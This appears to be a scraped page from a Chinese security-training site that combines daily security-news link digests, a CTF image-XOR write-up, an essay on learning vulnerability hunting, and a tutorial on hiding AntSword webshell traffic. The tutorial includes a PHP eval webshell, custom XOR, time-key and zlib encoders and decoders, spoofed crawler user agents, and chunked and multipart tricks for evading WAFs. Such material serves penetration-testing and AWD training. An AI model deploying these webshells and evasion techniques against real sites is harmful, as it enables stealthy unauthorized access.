免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Reddit启动公共漏洞赏金计划 https://www.securityweek.com/reddit-launches-public-bug-bounty-program 2、NVIDIA推出“ Morpheus”网络安全框架 https://www.securityweek.com/nvidia-unveils-morpheus-cybersecurity-framework 3、美国政府因SolarWinds黑客行为对俄罗斯进行制裁 https://securityaffairs.co/wordpress/116866/cyber-warfare-2/us-sanctions-russia-solarwinds.html 4、SAP Commerce修复了一个严重漏洞 https://securityaffairs.co/wordpress/116854/security/sap-commerce-critical-flaw.html 5、2016年交易所Bitfinex被盗的7.26亿美金比特币被转移到新账户 https://securityaffairs.co/wordpress/116858/digital-id/bitfinex-funds-moved.html 6、印度B2B包装平台Bizongo泄露643GB敏感数据 https://www.hackread.com/india-bizongo-supply-chain-exposed-data/ 7、超10万恶意谷歌网页投送SolarMarker RAT https://threatpost.com/google-sites-solarmarket-rat/165396/ 8、研究人员本周发布第二个Chrome 0day漏洞PoC https://www.bleepingcomputer.com/news/security/second-google-chrome-zero-day-exploit-dropped-on-twitter-this-week/ 9、风险和合规初创公司LogicGate确认数据泄露 https://techcrunch.com/2021/04/13/logicgate-risk-cloud-data-breach/ 10、研究人员发现影响容器引擎CRI-O和Podman的新漏洞 https://unit42.paloaltonetworks.com/cve-2021-20291/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、WhatsApp修复了两个远程利用漏洞 https://securityaffairs.co/wordpress/116833/hacking/whatsapp-flaws-remote-hack.html 2、Microsoft修复了NSA报告的2个关键Exchange漏洞 https://securityaffairs.co/wordpress/116767/uncategorized/exchange-server-flaws-nsa.html 3、安全研究人员发布QNAP NAS中RCE利用PoC https://securityaffairs.co/wordpress/116750/hacking/qnap-rce-exploit.html 4、NAME：WRECK漏洞影响上亿设备 https://securityaffairs.co/wordpress/116734/reports/namewreck-flaws.html 5、FBI清除了数百个组织的Exchange WebShell https://threatpost.com/fbi-proxylogon-web-shells/165400/ 6、研究人员成功使用JavaScript进行DDR4 Rowhammer攻击 https://thehackernews.com/2021/04/new-javascript-exploit-can-now-carry.html 7、谷歌修复Chrome浏览器中2个0day漏洞 https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html 8、勒索软件团伙利用旧VPN设备入侵Capcom https://www.bleepingcomputer.com/news/security/capcom-ransomware-gang-used-old-vpn-device-to-breach-the-network/ 9、Adobe修复Bridge和Photoshop中严重漏洞 https://threatpost.com/adobe-patches-critical-security-holes-bridge-photoshop/165371/ 10、FireEye：2020年追踪了650个新的威胁组织 https://securityaffairs.co/wordpress/116813/cyber-crime/fireeye-report-650-new-threat-groups.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、印度公司Upstox公司遭数据泄露250万用户数据 https://thehackernews.com/2021/04/indian-brokerage-firm-upstox-suffers.html 2、Windows、Safari、MS Exchange等在Pwn2Own 2021遭攻破 https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html 3、LinkedIn正式否认最近的数据泄露由安全漏洞引起 https://securityaffairs.co/wordpress/116689/data-breach/linkedin-not-data-breach.html 4、IcedID木马通过表单传播 https://threatpost.com/icedid-web-forms-google-urls/165347/ 5、英国NCSC发出针对Fortinet VPN漏洞的严重警报 https://www.zdnet.com/article/critical-security-alert-if-you-havent-patched-this-two-year-old-vpn-vulnerability-assume-your-network-is-compromised/ 6、Gino集团汽车经销商遭勒索软件攻击 https://www.databreaches.net/it-gino-group-car-dealership-notifies-customers-of-ransomware-attack/ 7、GravCMS修复严重的远程代码执行漏洞 https://portswigger.net/daily-swig/critical-gravcms-vulnerability-offers-lessons-for-software-developers 8、Zoom应用漏洞影响Windows和Mac版本 https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html 9、制药集团Pierre Fabre遭REvil勒索攻击被索取2500W美金赎金 https://www.bleepingcomputer.com/news/security/leading-cosmetics-group-pierre-fabre-hit-with-25-million-ransomware-attack/ 10、思科宣布将不在为某些小型企业路由器发布安全更新 https://securityaffairs.co/wordpress/116598/security/rce-eof-cisco-business-routers.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Microsoft开源“ CyberBattleSim”企业环境模拟器 https://www.securityweek.com/microsoft-open-sources-cyberbattlesim-enterprise-environment-simulator2、Pwn2Own 2021参与者赢得120万美元奖励 https://www.securityweek.com/pwn2own-2021-participants-earn-over-12-million-their-exploits3、纳坦兹核设施配电网遭网络攻击 https://securityaffairs.co/wordpress/116668/cyber-warfare-2/iran-accident-natanz-cyberattack.html4、130万Clubhouse用户个人数据在线泄露 https://securityaffairs.co/wordpress/116655/data-breach/clubhouse-data-leak.html5、Joker恶意软件感染了超过50W台华为设备 https://securityaffairs.co/wordpress/116643/malware/huawei-store-joker-malware.html6、黑客攻击第三方安卓应用市场APKPure分发恶意软件 https://securityaffairs.co/wordpress/116635/cyber-crime/apkpure-client-malware.html7、一男子涉嫌计划炸毁AWS数据中心被FBI逮捕 https://securityaffairs.co/wordpress/116612/cyber-crime/plot-bomb-attack-aws.html8、CISA发布了检测Microsoft 365威胁的工具 https://www.securityweek.com/cisa-releases-tool-detect-microsoft-365-compromise9、技术支持诈骗活动使用杀毒软件账单通知 https://www.bleepingcomputer.com/news/security/tech-support-scammers-lure-victims-with-fake-antivirus-billing-emails/10、美国肯塔基州失业保险网站遭受网络攻击 https://www.govinfosecurity.com/kentucky-unemployment-insurance-site-shuttered-after-attack-a-16376

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>>  流量分析 挂个代理直接抓包就好了 UA头修改 修改蚁剑工作目录的/modules/request.js，这里面默认是antSword/v2.1 一般需要修改一下，不然极其容易被发现，可以利用平常爬虫的一些技巧，随机构造UA头 let USER_AGENTS = [ "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 编码管理绕过检测 蚁剑里面可以自己构造流量的编码的效果，存在于设置的编码管理中，可以设置发送流量的加密效果，也可以设置返回数据流量的解密效果，但是我们同样需要我们上传木马的配合，这里又涉及到免杀这一个过程 蚁剑的编码器很友好，注释啥的写的也很清楚，官方给的demo是弄了一个随机变量名，我们的内容base64之后再次传入到这个变量中，再解base64执行一次eval，这个编码器最终发送的是data数组的内容，数组里面有多少内容它就会全部发送，数组的key值就是传过去的参数值 自定义编码 我们可以对其进行改造，这就是自定义改造了 参考这篇文章的例子：https://xz.aliyun.com/t/4000 ，文中是改成最后传输的数据随机字符串+传输数据base64+随机字符串 的效果，我们可以模仿一下，构造随机字符串+传输数据base64 的效果，只要被抓取的流量无法被直接正常分析就可以了 /** * php::base64编码器 * Create at: 2019/01/26 23:51:47 */ 'use strict'; /* * @param {String} pwd 连接密码 * @param {Array} data 编码器处理前的 payload 数组 * @return {Array} data 编码器处理后的 payload 数组 */ module.exports = (pwd, data) => { // ########## 请在下方编写你自己的代码 ################### // 以下代码为 PHP Base64 样例 // 生成一个随机 编码器选择我们设置的，观察流量，内容的前面13位是我们随机生成的字符串，后面才是我们真正传过去的内容 弄好蚁剑端的加密，还需要设置自己木马的格式，配合蚁剑，此时上传的木马应该是这种格式的了，这只是一个demo，正常情况下还需要免杀（现在一般都需要配合类的析构函数去实现一下） <?php $a = base64_decode(substr($_POST['a'],13)); eval($a); 当然也能实现动态随机字符串的流量构造，只需要传递多几个参数实现一下就行，要想使用form表单的方式发包，也可以使用multipart方式发包，此时报的内容就会是这样 官方提供的一些编码器 在蚁剑自带的编码器中，存在base64、chr、chr16、rot13四种编码器，此外，官方还提供了一些其他另类的编码器 https://github.com/AntSwordProject/AwesomeEncoder 但是自带的编码器中，因为将请求流量都会带有eval和一些编码函数的关键字而被WAF掉了，比如这个图： 所以在https://github.com/AntSwordProject/AwesomeEncoder 这个项目中，有一些编码方式会将这些函数变量进行一次编码或者加密，不行就多次，比如这里面的b64bypass这个编码器，跟上方的单纯base64进行比较的话，已经少了这些关键字了 RSA编码器 这种类型的编码器，可以在AWD中大放异彩，只需要轻轻点几下即会自动生成私钥公钥的内容 思路是来自于这篇文章：https://xz.aliyun.com/t/4640 可以放置别人骑我们的马，但是不能防止别人重放我们的流量 所以可以在此基础上加上一些token，ip限制之类的，蚁剑的作者提出使用时间校验的方式，超过5秒就不能来骑我的马儿了，只需要加上这么一句 data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`; 基于时间的蚁剑动态秘钥编码器 整个的流程是这样的： 蚁剑获取时间->生成随机秘钥->加密payload->发送给shell shell获取时间->生成随机秘钥->解密payload->将回显data编码->返回给蚁剑 蚁剑获取时间->生成随机秘钥->解密返回data->获取信息 这一个来回下来，时间还是一样的，因为时间只到分钟，密钥短时间内不会改变，加解密方法使用的是异或，这个流量已经很难解密了 zlib_deflated_raw 编码器 该方式通过将数据进行zlib压缩后进行base64编码传输给shell，这样要求shell将传输的数据先进行base64解密后通过gzinflate将压缩数据进行解压缩，从而实现流量混淆 这个编码器的加密效果也是不错的 还有其他的一些编码器，使用什么aes之类的，利用起来比较麻烦，有的还需要环境，个人感觉不太常用，但也能学习一下 解码器设置 返回的报文也是个重点，直接明文返回也比较明显，因为没多少站点会直接返回/etc/passwd 的内容 可以先观察一波原始执行的php代码，其中asenc函数是输出返回内容的地方，默认直接返回明文，我们在编码器写的内容，会在发送的时候覆盖这个函数的内容，服务器端执行完代码之后，实现返回效果经过编码加密的效果 <?php @ini_set("display_errors", "0"); @set_time_limit(0); function asenc($out){ return $out; } ; function asoutput(){ $output=ob_get_contents(); ob_end_clean(); echo "95922eac"; echo @asenc($output); echo "38160"; } ob_start(); try{ $F=base64_decode($_POST["td1b2e4829a55c"]); $P=@fopen($F,"r"); ech base64解码器 decode_buff部分是设置解密的，asoutput设置的东西则是覆盖请求函数中的asenc函数的内容 /** * php::base64解码器 * Create at: 2021/03/02 18:52:44 */ 'use strict'; module.exports = { /** * @returns {string} asenc 将返回数据base64编码 * 自定义输出函数名称必须为 asenc * 该函数使用的语法需要和shell保持一致 */ asoutput: () => { return `function asenc($out){ return @base64_encode($out); } `.replace(/\n\s+/g, ''); }, /** * 解码 Buf 设置之后抓包可以看到它里面的函数内容已经被更改了 而且返回的内容也不容易被轻易解出来，因为在a请求包中的output函数中每次都设置了随机的前后分界字符串，只有客户端知道分界位置，所以能直接解编码，WAF基本上是没法定位位置进行解码的，因此相当于base64编码前后都有一段随机的字符串，当然我们可以通过爆破前后位置最终得到base64编码，不过这也是蚁剑开发过程中的小细节，通过设置前后分解字符串来模拟了一个简单的加盐操作 也就是这两段东西导致不能够直接将返回包解码就可以得到相关信息，只能通过爆破跑跑 rot13解码器 相比于base64解码器，rot13解码器并没有很大的优势，因为rot13加密本身就是凯撒的变形，并且由于没有进行分组加密，因此加入前后分界字符串的意义也就不明显了，并且混淆程度也不高，能够直接将混淆后的流量在进行rot13解码便能能到明文 上述两个是蚁剑自带的，其实也可以自己构建相关的解码器 基于时间的动态秘钥解码器 只要在返回的内容中再次基于时间产生的密钥进行一个异或操作，然后解密操作在decode_buff实现 'use strict'; module.exports = { /** * @returns {string} asenc 将返回数据base64编码 * 自定义输出函数名称必须为 asenc * 该函数使用的语法需要和shell保持一致 */ asoutput: () => { return `function asenc($out){ date_default_timezone_set("PRC"); $key=md5(date("Y-m-d H:i",time())); for($i=0;$i<strlen($out);$i++){ $out[$i] = $out[$i] ^ $key 绕过检测的程度也很高 WAF的一些常规的封杀点以及一些绕过方法 参考这篇文章：https://mp.weixin.qq.com/s/u8_d8MXvFuwOyIMZZMBsog 其实蚁剑都能根据这些点进行绕过，实属大杀器，总结了个脑图 商用的WAF，由于要关注业务性，可能会把multipart/form-data这种多用来上传文件的传输方式检测关闭掉，否则攻击者持续上传大文件，一直损耗WAF的性能，容易拖垮相关业务，因此如果使用Multipart进行传输，对流量的混淆也起到了一定的积极效果 另外蚁剑还有分块传输的功能，利用的chunk这种传输方式，把payload分成一小段一小段传过去,这样原本一个包中的一些关键字则会被分割成很多小块进行传输，可以绕过了某些正则 本文涉及相关实验：https://www.yijinglab.com/expc.do?ec=ECIDee9320adea6e062018020614185300001 （通过该实验了解中国菜刀的特性及其通信原理、机制，并且学会分析可能隐藏的后门以及其工作原理。） 这个技术你学会了吗？加入网安实验室，1300+网安技能任你学！

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、思科修补SD-WAN vManage中的严重漏洞 https://www.securityweek.com/cisco-patches-critical-flaw-sd-wan-vmanage 2、开源学习平台Moodle漏洞可导致帐户被接管 https://securityaffairs.co/wordpress/116560/hacking/moodle-account-takeover-threats.html 3、暗网支付卡市场Swarmshop数据遭泄露 https://securityaffairs.co/wordpress/116549/cyber-crime/swarmshop-card-data-leak.html 4、PHP维护者确认在最近的攻击中用户数据库被入侵 https://securityaffairs.co/wordpress/116500/data-breach/php-sites-user-database-hacked.html 5、研究人员发现Azure Functions云容器逃逸提权漏洞 https://threatpost.com/azure-functions-privilege-escalation/165307/ 6、研究人员发现新的Lazarus恶意软件Vyveva https://www.welivesecurity.com/2021/04/08/are-you-afreight-dark-watch-out-vyveva-new-lazarus-backdoor/ 7、Chrome 阻止访问10080端口以防被NAT滑流攻击利用 https://www.bleepingcomputer.com/news/security/google-chrome-blocks-a-new-port-to-stop-nat-slipstreaming-attacks/ 8、CISA发布用于审查Office 365攻击活动的工具 https://www.bleepingcomputer.com/news/security/cisa-releases-tool-to-review-microsoft-365-post-compromise-activity/ 9、Win 10，Chrome和Zoom均在Pwn2Own中被攻破 https://securityaffairs.co/wordpress/116542/hacking/pwn2own-2021-2-day-2.html 10、Google安全研究员批量BleedingTooth攻击详情 https://portswigger.net/daily-swig/bleedingtooth-google-drops-full-details-of-zero-click-linux-bluetooth-bug-chain-leading-to-rce

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>>  安全类的公众号大大小小的关注了两百多个，经常看到标题为“实战|记一次xxx漏洞挖掘”、“某xxx网站渗透实战”之类的文章，比如：https://mp.weixin.qq.com/s/ETm92MHTNksURjOPNqFgHg，https://mp.weixin.qq.com/s/rxfJA44NWP1CIpVfrVh1KQ，https://mp.weixin.qq.com/s/vB3cHY4zxsPoNnuoTvNArQ。 不知道大家是不是跟我一样，每次都会点进去看，学习作者的渗透思路。 包括在蚁景网安实验室去年开设的网安讲堂上，也有很多关于挖洞经验的公开课，学习人数恒河沙数。 那么什么是漏洞发现过程？ 在某些方面漏洞发现过程就像解决迷宫、拼图之类的难题，也像一款很火的烧脑益智冒险类游戏——密室逃脱。 挖掘漏洞的过程就像从密室中逃脱一样，需要发现细节、分析推理并且借助工具才能完成。细品那些疑似漏洞的误报是不是很像密室中突然冒出来干扰你正常思路的NPC。 和留言板中直呼大佬的读者一样，我每次看完大佬们的渗透记录，也是如饮醍醐。甚至于经常被这种“记一次xxx漏洞挖掘”之类的标题所吸引，来不及领会的时候就放到收藏夹。堆积如山的除了需要学习的漏洞挖掘思路，更多的是每看完一篇的思路总结。 学而不思则罔，思而不学则殆。学习贵在实践、贵在转化、贵在总结，安全学习更应该边看边动手，把大佬们的技巧转化成自己的思路，并且定期总结。 从源码泄露到代码审计 相信很多人在尝试一个攻击手法时，都会从代码开始研究。去年年初的时候我还写过一篇关于代码审计的记录文章：https://mp.weixin.qq.com/s/c-etrgAVkHW7A8CLNVyz4Q，对PHP的几个危险函数粗略地进行了总结。 文章中提及的几个危险函数使用实例在蚁景网安实验室上也有相关的课程练习，名为PHP函数漏洞审计。在实践练习的过程中，我发现还有另一个课程——PHP代码审计最佳实践，其中关于常见Web漏洞的代码分析思路，完全就是我下一篇《代码审计进阶实战》的文章构造。课程详细地介绍了SQL注入、XSS、命令注入、文件上传等漏洞的产生原理及挖掘方法，课程链接：https://www.yijinglab.com/cour.do?w=1&c=CCID2d0a-0673-40fe-8ac6-bd3c08e8179f& 文章好像都不用写了，感兴趣的自己学习课程PHP代码审计最佳实践吧。 代码审查还有可能涉及到逆向工程分析，在蚁景网安实验室上也有很多逆向分析相关的实验，我对逆向不太了解，就不班门弄斧了。 工欲善其事必先利其器 审查代码需要花费很多的时间和精力，而且在实际漏洞挖掘过程中，遇到的更多是不提供源代码的情况，这就需要我们借助一些工具型软件对应用程序的数据执行进行监视。 实验漏洞扫描介绍了漏洞扫描技术的原理和如何使用burp suite对目标网站进行渗透扫描：https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015082709344100001 众所周知，AWVS也是一款知名的网络漏洞扫描工具，通过网络爬虫测试并检测目标网站的安全漏洞，深受业内人员的喜爱。 通过课程AWVS使用教程学习AWVS的相关配置，使用AWVS进行子域名扫描和Web服务器扫描等：https://www.yijinglab.com/cour.do?w=1&c=CCID90eb-df01-4b2d-9105-d94609391fed& 除了bp和AWVS，还有Nessus、AppScan、Wscan、WebCruiser等漏洞扫描工具，可以在课程渗透扫描工具使用中进行练习：https://www.yijinglab.com/cour.do?w=1&c=C9d6c0ca797abec2017041916081500001& 心中有树，手中创林 在学习实战挖掘某FTP服务器溢出漏洞实验的时候，用提交漏洞报告的作者给出的poc在系统中进行测试，发现漏洞利用失败了。其实在漏洞利用过程中，经常会遇到使用别人的脚本攻击失败的情况，有时候是系统不同的原因，有时候是代码本身的问题。同样在实验实战挖掘Mini-stream_Ripper缓冲区溢出漏洞中也需要编写自己的exploit，控制程序的执行流程，将恶意数据写入程序。 对没有编程基础的人来说，这样的练习可能会显得不太友好。比如在测试开源的漏洞挖掘工具时，突然想结合其他的功能一起使用，和课程用Python打造实用工具中提及的类似，拥有自己的专属利器：https://www.yijinglab.com/cour.do?w=1&c=C9d6c0ca797abec2016081211033700001& 当然如果想系统地学习漏洞批量扫描工具的开发，提高漏洞挖掘效率，可以看看蚁景网安学院最新的Python安全开发特训班：https://www.yijinglab.com/pages/activity/python-secure-development.html 我也是最近才了解到，看这个课程大纲感觉还挺诱人的，包括主机发现、端口探测、子域名获取、指纹识别；还有未授权、SQL注入、弱口令漏洞的检测：https://ke.qq.com/course/3413806?tuin=2dfa83c9 他们还不定期地在腾讯课堂和b站开设黑客入门课程、实战训练营什么的，感兴趣的可以了解一下，反正两分钱去不了澳门也到不了香港。 回归到问题上来：为什么大家都喜欢看‘记一次xxx漏洞挖掘’之类的文章？ 大概是看多了“为什么要学习网络安全“、“怎么入门Web安全”之类的文章，受国家战略趋势及网络安全发展前景的影响，越来越多的年轻人投身于安全研究与服务行业。在积累了一定的基础之后，通过学习大佬们的渗透记录，巩固自己的知识框架。 其实根据不同的应用场景及技术实现，网络安全也分为很多种领域，包括安全运维、Web安全、云安全、移动安全、工控安全、无线安全、数据安全等。 庆幸于自己的兴趣能够成为工作的动力，也希望大家能找到合适的发展方向，当然也不能受利益驱使做违法的事情。 这个技术你学会了吗？加入网安实验室，1300+网安技能任你学！

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、虚假Netflix App恶意软件通过WhatsApp传播 https://threatpost.com/netflix-app-google-play-malware-whatsapp/165288/ 2、德国Gigaset手机上发现预安装的恶意软件 https://thehackernews.com/2021/04/pre-installed-malware-dropper-found-on.html 3、攻击者利用Fortinet VPN 中的漏洞部署Cring勒索软件 https://securityaffairs.co/wordpress/116480/cyber-crime/cring-ransomware-fortinet-vpn-flaw.html 4、攻击者使用TG机器人和Google Forms进行自动化网络钓鱼 https://securityaffairs.co/wordpress/116459/cyber-crime/telegram-bots-google-forms-phishing.html 5、欧盟委员会和其他机构遭受重大网络攻击 https://securityaffairs.co/wordpress/116441/hacking/european-commission-institutions-cyberattack.html 6、Pwn2Own 2021首天白帽黑客获得超过100W美金奖励 https://securityaffairs.co/wordpress/116469/hacking/pwn2own-2021-d1.html 7、Google修补Android中的关键代码执行漏洞 https://www.securityweek.com/google-patches-critical-code-execution-vulnerability-android 8、Accellion Health数据泄露影响了超过100万人 https://www.govinfosecurity.com/more-accellion-health-data-breaches-revealed-a-16350 9、Aurora运动：使用多个RAT攻击阿塞拜疆 https://blog.malwarebytes.com/threat-analysis/2021/04/aurora-campaign-attacking-azerbaijan-using-multiple-rats/ 10、勒索软件攻击了爱尔兰国立大学和都柏林理工大学 https://www.bleepingcomputer.com/news/security/ransomware-hits-tu-dublin-and-national-college-of-ireland/

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>>  今天玩一个找茬游戏。但是我们不是用眼睛找，我们用代码找。 本文实验地址：https://www.yijinglab.com/expc.do?ec=ECID9d6c0ca797abec2016111111233100001&。 最近做的题基本都是用工具做题，这次来尝试一下用代码解题。 来看题目解压附件cry200.zip，得到两张图片（附件在c盘根目录下的解密200文件夹中） 我们一般就是比较两张图片的像素，用程序进行对比（这段代码在c盘根目录下的解密200文件夹中有） import java.io.BufferedReader; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.IOException; import java.io.InputStreamReader; import javax.imageio.ImageIO; import java.awt.image.BufferedImage; public class PicTest2 { public static void main(String[] args) throws IOException { int i,j; int rgb1[] = new int[3]; int rgb2[] = new int[3]; File file1 = new File("C:\1.png");// 实例化file对象，并设置读取图片路径 File file2 = new File("C:\2.png"); File file3 = new File("C:\3.png"); BufferedImage bi1 = null; // 像素缓冲区开始为空 BufferedImage bi2 = null; BufferedImage bi3 = null; bi1 = ImageIO.read(file1); bi2 = ImageIO.read(file2); bi3 = ImageIO.read(file3); int width = bi1.getWidth(); int height = bi1.getHeight(); for (i = 0; i < width; i++) { for (j = 0; j < height; j++) { int pixel1 = bi1.getRGB(i, j); rgb1[0] = (pixel1 & 0xff0000) >> 16; rgb1[1] = (pixel1 & 0xff00) >> 8; rgb1[2] = (pixel1 & 0xff); int pixel2 = bi2.getRGB(i, j); rgb2[0] = (pixel2 & 0xff0000) >> 16; rgb2[1] = (pixel2 & 0xff00) >> 8; rgb2[2] = (pixel2 & 0xff); bi3.setRGB(i, j, Integer.parseInt(Integer.toHexString(rgb1[0]^rgb2[0])+Integer.toHexString(rgb1[1]^rgb2[1])+Integer.toHexString(rgb1[2]^rgb2[2]),16)); } } ImageIO.write(bi3, "PNG", file3); //写入文件 } } 这里运行没有成功，看一下代码里面的地址。需要把1.png和2.png放到c盘根目录下(程序中已经指定为c盘根目录)把1.png复制到c盘根目录下一份，重命名为3.png打开eclipse，新建一个工程，运行代码（自己安装eclipse，安装程序在c盘根目录下的解密200文件夹中有） 然后打开3.png，如下图 隐隐约约可以看到图中有个二维码（这是真的很隐约） 那我们再加点代码让他看得更清楚些在ImageIO.write(bi3, "PNG", file3); 上面加入下面的代码（需要添加的这段代码在c盘根目录下的解密200文件夹中有） for (i = 0; i < width; i++) { for (j = 0; j < height; j++) { //System.out.println(bi3.getRGB(i, j)); if(bi3.getRGB(i, j)==-16777216) bi3.setRGB(i, j, -1); } } 添加了代码之后，再运行 再次打开3.png，如下图 扫码即可得到flag。 这道题是真题，当年难倒了一大片人。题目有迷惑性，要用程序对比像素。用代码解游戏题虽然是一种思路，但是速度应该会慢一些。 这个技术你学会了吗？加入网安实验室，1300+网安技能任你学！

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、攻击者利用SAP应用漏洞攻击企业 https://threatpost.com/sap-bugs-cyberattack-compromise/165265/ 2、美国国防部启动针对承包商网络的Vuln披露计划 https://www.securityweek.com/us-dod-launches-vuln-disclosure-program-contractor-networks 3、APT小组在鱼叉式钓鱼活动中使用语音更改软件 https://www.securityweek.com/apt-group-using-voice-changing-software-spear-phishing-campaign 4、Umbraco CMS中发现特权提升漏洞 https://securityaffairs.co/wordpress/116381/security/privilege-escalation-umbraco-cms.html 5、罗克韦尔修复了FactoryTalk AssetCentre中的严重漏洞 https://securityaffairs.co/wordpress/116391/ics-scada/rockwell-factorytalk-assetcentre-flaws.html 6、5亿LinkedIn用户数据被泄露 https://cybernews.com/news/stolen-data-of-500-million-linkedin-users-being-sold-online-2-million-leaked-as-proof-2/ 7、新的Janeleiro银行木马针对巴西公司 https://www.zdnet.com/article/meet-janeleiro-a-new-banking-trojan-striking-corporate-targets/#ftag=RSSbaffb68 8、数百名OnlyFans创作者的私人内容在线泄露 https://www.bleepingcomputer.com/news/security/adult-content-from-hundreds-of-onlyfans-creators-leaked-online/ 9、Apple Mail零点击漏洞可导致邮件被窃取和账户劫持 https://threatpost.com/apple-mail-zero-click-security-vulnerability/165238/ 10、黑客从ForceDAO窃取36.7万美元的加密货币 https://www.infosecurity-magazine.com/news/engineering-oversight-costs/